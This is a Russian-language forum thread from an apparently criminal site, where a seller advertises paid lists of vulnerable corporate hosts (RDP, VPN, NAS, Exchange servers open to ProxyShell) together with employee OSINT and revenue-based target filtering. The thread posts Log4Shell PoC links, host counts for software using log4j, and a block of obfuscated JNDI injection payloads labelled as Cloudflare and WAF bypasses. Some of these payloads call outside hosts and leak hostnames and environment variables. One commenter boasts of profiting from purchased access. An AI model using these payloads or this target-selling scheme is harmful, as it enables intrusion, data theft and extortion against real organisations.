What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Свежий материал для Exploits. IP 2 CVE / 0.0.0.0 - 255.255.255.255

marmalade

Midle Weight
Депозит
$0
Нужно получить доступ в сеть компании?
Открыть чужой рабочий стол по RDP или ворваться в корпоративный VPN?
А может заглянуть в NAS хранилище компании за бекапами?

Найду IP:port / Doman / CMS / Emails / Админки во всем интернете, именно те, что вам нужно.

Цена: от 50$ за простую выгрузку. Обагощаю данные слоями!

Опционально:
Check и верификация уязвимостей (приват и паблик CVE)
Отфильтрую денежные хосты IP/domain 2 Revenue по Zoominfo.com
Прочекаю хосты/домены на CMS и стек технологий
OSINT целей - найду корпоративные и личные email сотрудников
Также, в наличие API ключи Shodan/Zoomeye/Fofa и др.
Связь PM, отвечаю быстро.

Пример топ базы:

Последнее редактирование: 11.10.2021
 
База хостов Microsoft Exchange для экплуатации
Более 18% Exchange серверов остаются не запатченными и уязвимыми к ProxyShell.
40% подвержены уязвимости CVE-2021-31206

Бесплатная база выложена здесь:



И это факт уже освещен и получил дополнительное внимание в медиа:

Последнее редактирование: 21.09.2021
 
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
 
wav сказал(а):
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.

Ну да, не все хосты есть в Шодане. А вот в nmap нет ничего изащренного, как по мне. Просьба не разводить флейм. Тема только для отзывов и весомых комментариев.

Помимо Shodan, есть Zoomeye, Fofa, Censys и другие, где разные технологии и база данных хостов. Некоторые, просто не могут быстро или много сканировать, поэтому между ними будут отличие в 10-20% и чтобы собрать полную базу, нужно иметь в каждом аккаунты, выгружать их базу и совмещать, удаляя дубликаты.
Вложения
shops-scan-magento.png
Последнее редактирование: 11.10.2021
 
itś cheaper than buying a cracked shodan token, however it would be nice to have one with maltego and shodan transforms
 
marmalade_knight сказал(а):
Давайте просто сравним FOFA и Shodan на одном ip range (shodan не поддерживает CIDR нотацию)
Shodan: 7,935 FOFA: 20,196
Более чем в 2 раза. И это без исторических данных FOFA

Там ещё когда шодан начинаешь скачивать выясняется на самом деле хостов меньше чем он пишет в веб-поисковике
Я думаю что админы научились блокировать шодан а вот про фофу никто не слышал ничего.
Кстати есть ещё binaryedge.io
 
Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:
GitHub - YfryTchsGD/Log4jAttackSurface
Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com

Writeups:
Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace
Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to fix Log4Shell, why it's bad, and what a working exploit requires in this post.
www.lunasec.io
IBM Randori Recon
Learn about attack surface management SaaS that continuously monitors to look for unexpected changes, blind spots, misconfigurations and process failures.
www.randori.com

PoC's:

GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行
Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
github.com
GitHub - YfryTchsGD/Log4jAttackSurface
Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com
GitHub - xiajun325/apache-log4j-rce-poc
Contribute to xiajun325/apache-log4j-rce-poc development by creating an account on GitHub.
github.com
GitHub - udoless/apache-log4j-rce-poc
Contribute to udoless/apache-log4j-rce-poc development by creating an account on GitHub.
github.com

Detection:

Log4j RCE CVE-2021-44228 Exploitation Detection
Log4j RCE CVE-2021-44228 Exploitation Detection. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com


Здесь списки забаненых хостов которые эксплоатируют Log4Shell

GreyNoise
At GreyNoise, we collect and analyze untargeted, widespread, and opportunistic scan and attack activity that reaches every server directly connected to the Internet.
www.greynoise.io

CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
Последнее редактирование: 14.12.2021
 
Замотался и все забывал выложить софт с log4j для эксплоатации log4shell. Сделал небольшую подборку 34 софта из 100 в которых стоит эта либа.
Поделюсь в ПМ небольшой пачкой хостов по каждому софту для тестов

Log4j Software list:

Hosts - Software

86908 - APACHE-ActiveMQ
895 - Apache_OFBiz
2006 - APACHE-Zeppelin
36585 - 泛微-协同办公OA
237 - 致远互联-FE
5444 - 泛微-E-Weaver
45404 - 致远互联-OA
8101 - 用友-UFIDA-NC
2 - jeewms
3861 - vmware-Workspace-ONE-Access
99 - vmware-vRealize-Automation-Appliance
7976 - JAMES-Mail-Server
17292 - APACHE-Shiro
14394 - APACHE-dubbo
1003878 - vmware-SpringBoot-Framework
1023 - JEECMS
672 - Zipkin
1 - FORESCOUT-Administration
7259 - APACHE-hadoop-YARN
665 - APACHE-Storm
3599 - 用友-NC-Cloud
143 - vmware-vRealize-Log-Insight
660 - APACHE-Druid
494 - Firehose_SERVICE_MONITORING
173 - APACHE-Unomi
54405 - RedHat-Jboss
55990 - Oracle-Weblogic_interface_7001
5 - druid-server
96129 - elastic-Elasticsearch
377 - elastic-Elasticsearch-Engineer
12 - Oracle-BI-Publisher-Enterprise
258 - vRealize-Operations-Tenant-App
78154 - RedHat-JBoss-AS
87791 - UNIFI-unifi-摄像头
Последнее редактирование: 07.02.2022
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Thank you so much
 
взял под свой запрос. все быстро. 50$ не велики денжища
 
marmalade_knight сказал(а):
Database of Microsoft Exchange hosts for exploitation
More than 18% of Exchange servers remain unpatched and vulnerable to ProxyShell.
40% are affected by CVE-2021-31206

The free base is posted here:

Посмотреть вложение 25795

And this fact has already been covered and received additional attention in the media:

Нажмите, чтобы раскрыть...

bro please can you give the new link ? the old link is expired (((
 
marmalade_knight сказал(а):


Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:

Writeups:

PoC's:


Detection:



Здесь списки забаненых хостов которые эксплоатируют Log4Shell


CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
Нажмите, чтобы раскрыть...
wow thank you for this useful info. I very much appreciate it and i'm sure many others do as well!
 
Пожалуйста, обратите внимание, что пользователь заблокирован
New link please
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Закупился матом по форти и цискарям - лутнул ровно лям зелени. Материал божественный! Закупаю следующую партейку!
Последнее редактирование: 25.01.2023
 
wav сказал(а):
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.

Почему изощренный?
 
2 статейки рекомендуются к прочтению. По сути без разницы какую цифру шодан показывает, она не как к реальности не относится.

There Are Too Many Damn Honeypots - Blog - VulnCheck
VulnCheck faces a horde of honeypots while assessing the potential impact of Atlassian Confluence's CVE-2023-22527. This blog delves into Shodan queries to filter out honeypots and uncover the actual on-premise Confluence install base.
vulncheck.com
A Log4Shell Retrospective - Overblown and Exaggerated - Blog - VulnCheck
Log4Shell was proclaimed one of the most critical vulnerabilities, but in this blog, VulnCheck challenges that perspective, revealing the limited number of vulnerable systems still present two years after the initial disclosure.
vulncheck.com
 
Top